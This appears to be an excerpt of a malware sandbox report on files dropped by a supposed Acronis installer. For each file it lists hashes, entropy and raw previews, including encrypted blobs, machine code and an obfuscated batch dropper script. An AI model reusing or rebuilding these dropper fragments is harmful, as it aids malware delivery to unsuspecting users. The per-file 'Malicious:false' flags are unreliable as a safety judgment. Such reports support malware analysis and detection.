                                                                                                                                                                                                                                        SHA-256:F8E2E5B144310C92D009450BD3EE03EBF61AF48C51829A0CAC102A078517E7AE
                                                                                                                                                                                                                                        SHA-512:CD03BCC79DC05EC29BF4941172CE1A9DB0988A1618F09959BEA01A86609401C146B03BB668109078B907B50F5A5957699552A186FBC081C1EC04278FE95D4C3D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK.........Y........6.[... .pjnbshUT.....Wg..Wg..Wgux.............L[.|SU...2#:(....A....Z...4[.4I.7m.6i..i..,....U...J.Fd.......3....%.HU(e.....&.9..g...6y...9.s.}..H!...2./$...!%...B..>.?6B...D....u....^B....Z..I..3.....|...x..r.v]Q.....|G*..KWE......e\..j...4PDH..j...<.....q..FC..yA..RR.K8t. .7..B.H.....1V...2..@....b.|,$vq)..._%..S..J...!.JDr.[..V...Q...O\!P....s$..$..TH.._BL..Kq>.*H...BE...Z..e..q..C.(RD..6.U..~...D&...]1...D...<DK?....F.#.r?./.T..V..V0.t.jT...h.*..V9...CZ5DD.0..G.vx.Y..U..zN..2.=.x..-."6..L....K..aB..%\H..!.{......C.S.M1}x%1.....G1.S....VZ-1.....m.@.t.Ba.<..cT15..`..c......V...j.f..?|k9kQ.Qo".~....:.J.#".l.T2z1..|4N%..\.V.....>.=F.">..9P.,..r.j....{a.A.. H.....2.T1C.N..\.....U.e..E..u.............NRXJ.b..O.V...%.h...G..Ox.'.8.#%.V?.!..h.g.W+.j/.@A..F....MBR.%...l..br5]C...V.HX.9...........YmE.!..F..`D..@......b.....D....E4c...o..`Y...............D.."f..Hy.(F.4`".+.O........J.`.z...9. .....bF.U..x...@.......<.A.t....E...0.....".?..
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):119808
                                                                                                                                                                                                                                        Entropy (8bit):6.585854620954676
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:WBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfU:WjphfhnvO5bLezWWt/Dd314V14ZgP0f
                                                                                                                                                                                                                                        MD5:13D24AA4E93EF82DA1567D83B817C03E
                                                                                                                                                                                                                                        SHA1:24B214EF35060CCEA94AE5193B8360E7611BF3DD
                                                                                                                                                                                                                                        SHA-256:9824CABFCE1C95130BEA6B69F6E03999E97CF2C45E6922C2E3A3104FCC373205
                                                                                                                                                                                                                                        SHA-512:FAB74277A3FF0DE9E87D54B994BD47EF7DFBBC62C17CC7464E4D1DF419D16E68CC754BCA7934ADD146B89E0B8C2A341F66740E5BD833D448F1FDE8F7D4818BF4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.N..................u....u._^3.[..]...U.......S.].V.L$.W.C.....0......F.........u..u....]....&..F...........C..H..0......C..H..#....D$..C..H.......D$..C..H.......{...D$.r..C..H.........L$.j.W.t$.V.%.....}....t.j._.C..0........N........t$...........j.W.t$ ...t$(.C%.............C..0......N........L$........n..._^3.[..]...U..E.V.@..0...~....F.... .....u..u....F....&..F.....3.^]...U...TSV.5,.I.3.Wh....S....h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...E.E.P.E.........I...uN.u....S......3.B.V....H..D9.8\9.t..@8.P..D9.8\9.t..@8.X...0.I.SP...H.....q.....E..t.;D..t.C...~..u....~............F......._^3.[....U... SVW.E...P....I...4.I.P.E.P.......@....E..}.)E..E.)E.....u`.M...t..3..j.CSV.Rz...M..E.3..M.WSPV.}.]..(.......M..]....E.S.E..E.SPV.}.]..........M..:....~.G....?.....u....H..|1...D1.t..@8.@......|1...D1.t..@8.@...B......u..u...}.......F......!.G....
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):105472
                                                                                                                                                                                                                                        Entropy (8bit):6.684445075295248
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:Ixu6/sPYcSyRXzW8/uC6LdTmHwANUQlHS3cctlxWboHdMJ3RraSXL21rKoUn9r5J:G/sZydTmRxlHS3NxrHSBRtNPnj0nEz
                                                                                                                                                                                                                                        MD5:CA217340293A4943C905BA624E7A6C72
                                                                                                                                                                                                                                        SHA1:D8334AC7F442203C9CA73BAEAC9F7A7435BB173E
                                                                                                                                                                                                                                        SHA-256:5190F6FEDA768EA309ABFB4B2BD8F46A9A4CC82274E429849828514C70D9D813
                                                                                                                                                                                                                                        SHA-512:951583B82531B90188AAD52AA0C7A305AD3BE7697A3EE1B1F6932FEBA39FD9A4D56EB8C49192A46463D752BBE17ACAE926D1913820CB14A8C0BD2EEE7A59AE01
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<G.E.@.}..E.;E.|..6...;M...0...;~|............E.....%......=....u&..G.......%....................E...............s..FD...........E.<G.E.@.}..E.;E.|.....;M.......;~|sp......E.....%......=....u#..G.......%..........E....................Y....FD......L....E.<G.E.@.}..E.;E.|..2............%...;............Fh.............."............:"...$.7.E.;M...Z....N|;........V...t..F.j.PQ..........t-.....V....+.;.w.f..f;F4u..........f.G.f;F6tw.......t1.G.;F|r).~..u#.~..u.f..f;F4u..Fh..............!...E...@.}..E.;E...\....%.......t.;.....v..Fh..............!...U.....)M.N|..+...9E.v7..........}...d...;.......X....Fh.............D....F!...E.<G.}..1...;M...(....N|;.sy......u.....}.;.......f.?.tF.J...t?.~l..........t0...t+.E....f;E.t..E.( ..f;E.t..E.) ..f;E...........}..E.@.E.;E.|..................;............Fh.............{....} ..;M...m...;~|s....=....w2..X...=....w...K........B..... uG.8...=....u;.,...=_ ..w$......=. ..r"=. ........=/ ..u......=.0...........A.}.;M...y........;M.......;
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):86016
                                                                                                                                                                                                                                        Entropy (8bit):7.997710944828758
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:46RFKjL890OVVfezm6ouihqnb5DklhWEZbJdZuQduDIl+:rPKjYLOy6R7ShpbJ3rl+
                                                                                                                                                                                                                                        MD5:257EBB27CC75D77A9DEB487F9496059D
                                                                                                                                                                                                                                        SHA1:374A7ABE4C482535F63F7FC51D96ADD1D6C6E5CD
                                                                                                                                                                                                                                        SHA-256:ACAC2C119EA0FF3B18BBD1B0F51EC69ADDB4FA1F211F3CA1802EBB431054D4B1
                                                                                                                                                                                                                                        SHA-512:EFB47585757E246B2F4F45C0014B0E054AE7509CF0BDE92786B79708AC85581D1364A1074ECCDCBFBD9F68EECDC4B8D81396BC3782BC1E020BF1FE5676FF9440
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:7..fY..y..eS.K...6...o.7d.}...C... .......y^$.a........ ..M..3....S..+i.raj. &...@.Y..8...c.A.+...h.+..i....}@-.{.2....m......~.L...P`x......A9......'..&-`..kfg...a.<"}...XL.b.i..g....,..a\=.|x.o=G$..x.2......v)..N../g..l.N.@...}..R.T....A...aZ..M......z......!...._A...h.xk;Sfk.c.~P..2..7..l.@...'........VgC&0~<*v.+r...m....!.......*..T.\...5e.[......w.H?@.<.H*.<...22..Ce.X.{.bq......>[.....0.n}4....G......Ph..j..,^...&V.....w.V./.\.....k....xW.......]..\..3.^0.9.=...Uj....`b.a..5..........^...................QW....#.V..Gq..H..X.....e.Y...$..q..28.....[..._..22a..z....nL....N{.c..........h.. .F...].....>._xp~..R..G.h.>GQI.0...$W.;.X~U.j...Y....t....e0@.W.!f.5...GVp.{Q....i.$...l...2p..[a.o&~.o2*JN..+p.d".5..Vy...=a..."0K)..?.0.p..&.m^...l]...*..>....J..?G........R...E..C.9..2r.d..v.$...M..k./.-0..8.%\.*/. .|(....?..><..'|.......hR..fc.{J2H..j...n..;H..c.{va<i...U.,F&!2G$.w...t.....i..,.Z.v$.b.......s.:.I.^E..5.v..6....M...
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):79872
                                                                                                                                                                                                                                        Entropy (8bit):7.997726432731598
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:p5GXkJnHaV+UkE5DoAboy97UIOUdN2srBWObwWyxU+lj3XEZGLSGZn:yX5wYuAbL97UINHr5N+lgojZn
                                                                                                                                                                                                                                        MD5:1B651C62E9976918E54FF11622792B9C
                                                                                                                                                                                                                                        SHA1:FF757994E070F9ECCD138D02273834AAB9637684
                                                                                                                                                                                                                                        SHA-256:5DAAD9BFBDFB2D5AA081FCD8F7764EBAD17FDD4E9F690FCC2A5F12A07CCDA58B
                                                                                                                                                                                                                                        SHA-512:E18A73B16BF232FA2589CEEACAB11AFBAF2BFF90665A31E700687F5C227312BB0AEB8068F336F6C969467DEB2D6C60E812E4BCC2666CAB250BB781233FEF7851
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:..6...3.'X...Q]..9.X].....z..`...rE^..XZ.Xw........$.......p.(....u..S.D...wS.v5...R.obfe.5.qo;..X..).........pJz.../..Pc....f.G...V....d0..S....h'X9...vw.....6.zs...?.$.,I..8......./6.._.......KE....p........S.~.&....5z......}.._.nK`h....[H........!.....B..E...s.....T3..<4.r...<.`...q.......G?u...O.5...6.W....o...1...o..v.|..F.A.7l.`..JO....N....J.R@.*.......a...|....&.X%.!.k.W.K...\e....'.."...)P...Uzx...0...........q.%.....^.<u....e.n]T..5.!0P..{5-.....FM....D2...8.....nWq.^.hJ.Bs^4..X..f.z.(}.au.*..e6.5 v.?nb.I.y39.1}..-(-..3s....n..b...qKqo...=[..nQU......g.an.s..gu..wE...z..74.w.ed.#P./Y...u....N:B....!...[...".....D.K...d.U.".....J.b'......].*.....7.....+......7(.........u....Y.1.........$..D.3E.Z...)}MG..<.p.BP........?.NS.8........1c...R$.u.....}..<."z../...|WL3.L%d.-...O....c..a....,..Z.Y.X.o....m..P..d...D.r0v.%ACe...W.....:........6...I...%.r.dpW....5$..Z....am.$..~...J..U~Q|.l..(....Kk..)....].......C?-.e!...UaV.B...
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):53248
                                                                                                                                                                                                                                        Entropy (8bit):5.5737899996482545
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:eVGHj1vtK7h6R8anHsWccd0vtmgMbFuz08Qb:+q8QLeAg0Fuz08a
                                                                                                                                                                                                                                        MD5:F71A6B8DE5E35D265DF820D0FB5344DD
                                                                                                                                                                                                                                        SHA1:209BCDCFD5023C7263A8D4AA879D56DE1ED6791C
                                                                                                                                                                                                                                        SHA-256:C1A62EFA509B011E4473E9533E0F99DED16601FA7C222AFD8104BBC7759A1C6B
                                                                                                                                                                                                                                        SHA-512:2B10CD9C08F02A25508AAB9A8BF8556062DF2473569062DDFD4AC573806BC781B0F086BD83829B477DB277DF2AC2B177BB3538C1BDFB89A5F0BD930F0D1D1D83
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.B.K.C.O.L.O.R.....I.N.I.R.E.A.D.S.E.C.T.I.O.N.N.A.M.E.S...G.U.I.C.T.R.L.C.R.E.A.T.E.B.U.T.T.O.N...D.L.L.C.A.L.L.B.A.C.K.R.E.G.I.S.T.E.R...G.U.I.C.T.R.L.C.R.E.A.T.E.U.P.D.O.W.N...G.U.I.C.T.R.L.C.R.E.A.T.E.S.L.I.D.E.R...S.T.R.I.N.G.R.E.G.E.X.P.R.E.P.L.A.C.E...O.B.J.C.R.E.A.T.E.I.N.T.E.R.F.A.C.E.....G.U.I.C.T.R.L.S.E.N.D.T.O.D.U.M.M.Y.....F.I.L.E.C.R.E.A.T.E.S.H.O.R.T.C.U.T.....G.U.I.C.T.R.L.C.R.E.A.T.E.I.N.P.U.T.....S.O.U.N.D.S.E.T.W.A.V.E.V.O.L.U.M.E.....F.I.L.E.C.R.E.A.T.E.N.T.F.S.L.I.N.K.....G.U.I.S.E.T.A.C.C.E.L.E.R.A.T.O.R.S.....G.U.I.C.T.R.L.C.R.E.A.T.E.C.O.M.B.O.....G.U.I.C.T.R.L.S.E.T.D.E.F.C.O.L.O.R.....P.R.O.C.E.S.S.S.E.T.P.R.I.O.R.I.T.Y.....G.U.I.C.T.R.L.S.E.T.R.E.S.I.Z.I.N.G.....S.T.R.I.N.G.T.O.A.S.C.I.I.A.R.R.A.Y.....D.R.I.V.E.G.E.T.F.I.L.E.S.Y.S.T.E.M.....G.U.I.C.T.R.L.C.R.E.A.T.E.D.U.M.M.Y.....T.R.A.Y.I.T.E.M.S.E.T.O.N.E.V.E.N.T.....G.U.I.C.T.R.L.C.R.E.A.T.E.R.A.D.I.O.....W.I.N.M.I.N.I.M.I.Z.E.A.L.L.U.N.D.O.....G.U.I.C.T.R.L.C.R.E.A.T.E.G.R.O.U.P.....G.U.I.C.T.R.L.C.R.E.A
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2792
                                                                                                                                                                                                                                        Entropy (8bit):5.460118362302476
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:i9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLVJcd2u+MAyKnFHi:ySEA5O5W+MfH5S1CqlVJcI6mli
                                                                                                                                                                                                                                        MD5:DC6DCA71DC33501438D2C65C5F1C53A6
                                                                                                                                                                                                                                        SHA1:7A8158725676B303FD95694A1DF5E1C691CFB8DD
                                                                                                                                                                                                                                        SHA-256:90B33984857F95C59E3047C7B94CEB5F2F9898BE446BB12941EF9C646532F349
                                                                                                                                                                                                                                        SHA-512:DE13200D1E804E2E6658A7947549F1A62A966273E99682306735313B9FA6D4FBCC66EB785E581952FEA5FB38AA04706C921686EF214F7FE3B56471661778CF92
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:GERMANY........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):80896
                                                                                                                                                                                                                                        Entropy (8bit):7.997548876997834
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:hTRnjxMaHcO00CECYYAMRobjKgJKslK2PeIUD8EM6619k38GZBIc2A2C:hdjxx9PYA8ovKgUslKzfSDzT+/h
                                                                                                                                                                                                                                        MD5:F997AAAD93BAC3365407710C482548D0
                                                                                                                                                                                                                                        SHA1:4FECD0DE9DE798A1698B86270240E8C697228386
                                                                                                                                                                                                                                        SHA-256:C6A7EB882C69AC388BBF30F2F1050F1BC8C1F5D677C410254ECB43B96BBE0878
                                                                                                                                                                                                                                        SHA-512:38742124AF5D43E665A852F61FE5A462469CC7492487B8F88445664B13CCFCA0550470DFA23ECA233546179F7D30D2C2C533B07DA1D69F75CFD7E399C58CB1BD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.....]&.l.-Q.G.......{..}..7ra*1...c......+)...#..*..V...@..J.W.YlXv...d@.P?97K....A1.>...2.t.....5..Q..T..a.2xoDR.b*}h..=..?..Y.h..2.{og.G.f..K..d...ZN.K..Dt...$..v..k..Eb.......b.....o.7...Q.Y.9p...../r.DE?..q....x.C@..#..?..K.......pv.iv7...n...C.........&D...7....SJK...bvW.n..0.d....S..@Nb../..........nh7..4^....W.p.....Bv...R..Vhn....8.....M.v. ....1.F.Z...kR....p......C.nT=Y..'$B...mK!(.D.......4....."k+.eQ...+..H=...5v..23..h_YG..Nu\e0C..r......w/.^).^...D...m.4....T.#i......"o6.I..B.5..^imldQP.....>....w..q..R1...@.:......\d1,nc...%.E........}..+...U..c..H<...(rG.Cd.J.F..I.FF.2.....=...?..9..]e...%A.3("Z...T......Unb...e.........r#h.RI.{p.-;...?.O/'...;..S.N.h'g..f.1.../......$=q.I...Lf..3.5..c.:....V_.?+*C./.%.q.Y...!.N..@m....:.Y..".5.jA......i..{.TDU.5....s...r.LI.R.>.;._....n*j].)....SM..ny>3.|..R^C.&.'..)....?..M.....'...V....\....2.Vb...Q..g[&......{..2M...U..F.._...Bc....v...$..Bz.>ZoDWh..<..T0.....LU..4..!`..rG'.../.
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                        Entropy (8bit):7.997023843324058
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:cB4SI2Np9uP60eWPV3nOKXCNDVGsEhiR3GeEjcZg:cB4I9gOfhGsEwRhK
                                                                                                                                                                                                                                        MD5:030E6B7BDC54511621DDC51FE1D3070B
                                                                                                                                                                                                                                        SHA1:ACBCB368A81C3FD446D64BEE1B7D8BD4C3724BCF
                                                                                                                                                                                                                                        SHA-256:B7CA4DB3EF2AEA9BC3588331BA7DDEB0DA874F67175D039C71B1C37DF12CBAA2
                                                                                                                                                                                                                                        SHA-512:817A5C0B45B42438F1626A1D841F144CB58AAD2272F914660FCD1FB379931CE4E9A6791E359A08E4D1807E289147639644D2D1704B799E8B3A445EE4CFBC73A4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.if.%m..|..l...X...u?....P.@.>'...KX..R.L..z....k..u...&..).T.d..a..\l+..d4o6.].. Z..3:..[K....U....8.=y....H:....8.....v...A."K......-Xe......zx..}.k...r.1..p.._N.xl..;.......YJ......&.*9A.[..Q...... c]#..PT..9...G.DE...`j.&.R..b..9.....J..%ly`...|..*..L ..q)9.Y....n...b..\.&...:.P....&..-....n .i_k8....rD.0.K:e....W..X..<B.&..x^..i..... _%y@L1D(...4.b..:.....b.......n...?)... u..G..@2Dvj.=.E._.)..g.$.;........_.}5}.:.Ga...B"...J+D.PJ....e....:......u^.wu.L.......UKPO^...c.I9.P...p....9.....*..<..;..!<.dt.....q`..`<..1}.f;BR.)...:.....es.....xT...........C.M......nb.xbk......T.0......._X...t0.m-2. z.(.._..~..)4....f^m'........?....ef..._.t........PE......:...u.N.\...!..C...f......H.N.W... Z~|.0@z... }.v...H...G..X....!.,[c.G...O`5...9~5....Z.d89...3B:..<....z......d..FzN....[..T...ZBv.......PO..c.y?...I.hUUH...'O~..h%.C..v..Q"%.g.B<(...8..F/y.^p...!....M...............#I.....3..Bv.......8....gam.T...w#...\k...w....Xt.A....."..d..&
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):113664
                                                                                                                                                                                                                                        Entropy (8bit):5.3694203589687115
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:Baj6iTcPAsAhxjgarB/5el3EYrDWyu0uZo2+9BGmdA8:Q6whxjgarB/5elDWy4ZNoGmr
                                                                                                                                                                                                                                        MD5:4995F791E86BE37567C50323B0B3D98B
                                                                                                                                                                                                                                        SHA1:DC17AD984ECB982CDDAA79592FFF79363A46B45F
                                                                                                                                                                                                                                        SHA-256:71D01D67E707498F1090A296C554F63901FB4F0C9A5846335DE67F47B091D7E3
                                                                                                                                                                                                                                        SHA-512:EA99B97CFA615B57F1F6CAD67636A887D04B720E5EF3A21E28434676457845E6907478321CF6B06CE6637A9A0FFE7C104BB629C70638AC9F488861C3110BBDBE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.......................................................................................................................................................\.p.{.L.u.}.....\.P.{.L.u.}.............................................................................................................................................................................................................................................................................\.P.{.X.a.n.}...no error.\ at end of pattern.\c at end of pattern.unrecognized character follows \.numbers out of order in {} quantifier.number too big in {} quantifier.missing terminating ] for character class.invalid escape sequence in character class.range out of order in character class.nothing to repeat.internal error: invalid forward reference offset.internal error: unexpected repeat.unrecognized character after (? or (?-.POSIX named classes are supported only within a class.missing ).reference to non-existent subpattern.erroffset passed as
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1247), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):26936
                                                                                                                                                                                                                                        Entropy (8bit):5.10701699479355
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:3mL5/kYydE83/1cQEEyG4wJH0YR4zuZAUgJFk4a:ikn3tcNEj4wJHTylfk4a
                                                                                                                                                                                                                                        MD5:E93B09D6C9F09D9E3D7EA2B3E08C1688
                                                                                                                                                                                                                                        SHA1:4BB379C69728D45BC2CB8C762A7134186EFD0F37
                                                                                                                                                                                                                                        SHA-256:8742A9865A67762D52402C5489930CE2C5C31580BA2DAF76C23FC9007738F549
                                                                                                                                                                                                                                        SHA-512:2636B6A95BA082B1C55BD9E35B29963EB1D4FF2D1530F76A333FE6EF09301CBDFBABADB5CB4D25DB034357C53CA8C3E85BDA9EEC28BEDFF99309C9FA8628A257
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:Set Co=X..VrgFFill-Linking-Beautiful-Quick-Ver-..MEICrew-Requires-Sw-Topics-Knights-..bfxBuck-Blow-Brief-..HhdCollaboration-Thoughts-Tribune-Aaa-Topics-Vienna-Approximate-Alan-Locale-..vfIng-Move-Rec-Spray-Oasis-Peripheral-In-..obThis-Dv-Greensboro-Den-Handles-Rebel-Av-Potato-..QcNeck-Creek-Sprint-Transition-Subsequently-Ion-Armenia-..SyPirates-Lisa-Given-Licensing-Amsterdam-Objective-..IqviOrg-..Set Ip=O..kNIkButt-Dresses-Dear-..pIVRBlair-Notebooks-Your-Whats-Origins-Spatial-Theorem-..SPVenice-..UHMonetary-Saver-Genome-Accidents-Lindsay-..RTFounded-Infants-Blind-..SasWithdrawal-..GcxyAlive-Attitudes-Throat-Suspended-Controls-Ear-Segments-Gamecube-..nFTSpecifies-Copyrights-Agreements-Rocket-Calvin-..Set Mississippi=s..vHCatering-Sunday-Ala-Nebraska-Gibson-Questions-Become-Fans-..xbiProductivity-Developing-Host-Domain-..OajProprietary-Fusion-Transportation-Filed-Realtor-Aquatic-Duplicate-Olympics-Line-..XAFkAtlantic-..vUpGravity-F-Diana-Subsidiary-Vocational-..NgPaying-Edited-Password-C
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1247), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):26936
                                                                                                                                                                                                                                        Entropy (8bit):5.10701699479355
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:3mL5/kYydE83/1cQEEyG4wJH0YR4zuZAUgJFk4a:ikn3tcNEj4wJHTylfk4a
                                                                                                                                                                                                                                        MD5:E93B09D6C9F09D9E3D7EA2B3E08C1688
                                                                                                                                                                                                                                        SHA1:4BB379C69728D45BC2CB8C762A7134186EFD0F37
                                                                                                                                                                                                                                        SHA-256:8742A9865A67762D52402C5489930CE2C5C31580BA2DAF76C23FC9007738F549
                                                                                                                                                                                                                                        SHA-512:2636B6A95BA082B1C55BD9E35B29963EB1D4FF2D1530F76A333FE6EF09301CBDFBABADB5CB4D25DB034357C53CA8C3E85BDA9EEC28BEDFF99309C9FA8628A257
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:Set Co=X..VrgFFill-Linking-Beautiful-Quick-Ver-..MEICrew-Requires-Sw-Topics-Knights-..bfxBuck-Blow-Brief-..HhdCollaboration-Thoughts-Tribune-Aaa-Topics-Vienna-Approximate-Alan-Locale-..vfIng-Move-Rec-Spray-Oasis-Peripheral-In-..obThis-Dv-Greensboro-Den-Handles-Rebel-Av-Potato-..QcNeck-Creek-Sprint-Transition-Subsequently-Ion-Armenia-..SyPirates-Lisa-Given-Licensing-Amsterdam-Objective-..IqviOrg-..Set Ip=O..kNIkButt-Dresses-Dear-..pIVRBlair-Notebooks-Your-Whats-Origins-Spatial-Theorem-..SPVenice-..UHMonetary-Saver-Genome-Accidents-Lindsay-..RTFounded-Infants-Blind-..SasWithdrawal-..GcxyAlive-Attitudes-Throat-Suspended-Controls-Ear-Segments-Gamecube-..nFTSpecifies-Copyrights-Agreements-Rocket-Calvin-..Set Mississippi=s..vHCatering-Sunday-Ala-Nebraska-Gibson-Questions-Become-Fans-..xbiProductivity-Developing-Host-Domain-..OajProprietary-Fusion-Transportation-Filed-Realtor-Aquatic-Duplicate-Olympics-Line-..XAFkAtlantic-..vUpGravity-F-Diana-Subsidiary-Vocational-..NgPaying-Edited-Password-C
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):83968
                                                                                                                                                                                                                                        Entropy (8bit):7.997823110523501
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:+p0HZZ27AnG3PugJuJ31yHTyYbs+aAlPiVOTp72OTz+U301vcOyG:+O2oGfug4kOcnlTTzt30R
                                                                                                                                                                                                                                        MD5:70BBC8130EE71A5FF4D48D5A932BF6FC
                                                                                                                                                                                                                                        SHA1:2B2D259558F4FB767ECEBCFCD525C850A46519AF
                                                                                                                                                                                                                                        SHA-256:3ED2CECD3B363CAF278CFCCAC739203BAFF8ED6741FEF81AB4D6515654C8221D
                                                                                                                                                                                                                                        SHA-512:C91D63E83F3E7C859A799C8EBEB419E573E37C4371535A3952DD32C7D5765165127EA2C6F069BAA9E28A44D9D6E41BAAD37A12513AAA45366DBCF48C9EF46731
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.e-...y.m?>.b.1.2.M..@....,'{Qk.........3.'...Y..hl..&c....-.+8: .OI.G.$.(G.:.........%....y............7Hi2Nt@6I.Lg.[......H.8h@.VK.r....D.N.p'..f..z.....N...`2.........h.x...q.r.<.6..J~.j....2.~!....sH.$.....d..`...zK...k,C.R..d9.....U.g.7..........H.x(...G*.._..b..&|.u.X.$.....u...N.{+..g....k.n.2....Bzro.......w.j._:..Z...\..z<...GH.z.5.Z0..o.]e.{..".=.9.hr....O.._.d.......e.N..mw......"...cY.......8m..O....Mo.......^.K...PB.'f...,..=GN..Q.....`s4Z.\....f?.....!...4.p.Y...<=a.......0.y`.]f.....fM..E..L.S....$.[...y..y.:..$..H.xMB..d.......+w.^.[y.+...1.mS.VL..........|.Ses0..I,.=.p..`.q.....9a..~.+.T@..c.8.I.]=..z....i~.s._.5.R/\33.B....F..y..u.t...1..J....,D.#F.p.u..L.N3.......K.7..r6..dF.(6./.....M.?t-W...H...5.q...`..{...9.2.oe...+..n..n\..>.K..ZS._.......\...R.S.I.|#.'F<.ef.....6.... l.^.....E...vv...W?...[.Q....7....z.H.=Y132m|...hT..zVT..N..].~...1...u.wa...}Ip'.%...)...(..........(.m/..`{<.ET.1..s..7.Y....v.
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):75776
                                                                                                                                                                                                                                        Entropy (8bit):7.997292934091786
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:fhBOY4jjgGW0ZC+z7DRKHVsWA21a8kCjjlRycd3jYO94u:fnOYeC0ZC07DAHV021a8tl8cd3Z4u
                                                                                                                                                                                                                                        MD5:781C193F00D297CD53A1EB59C9CDF70E
                                                                                                                                                                                                                                        SHA1:B64BEE781F783C1E89FDC9039EF26FB855EE0066
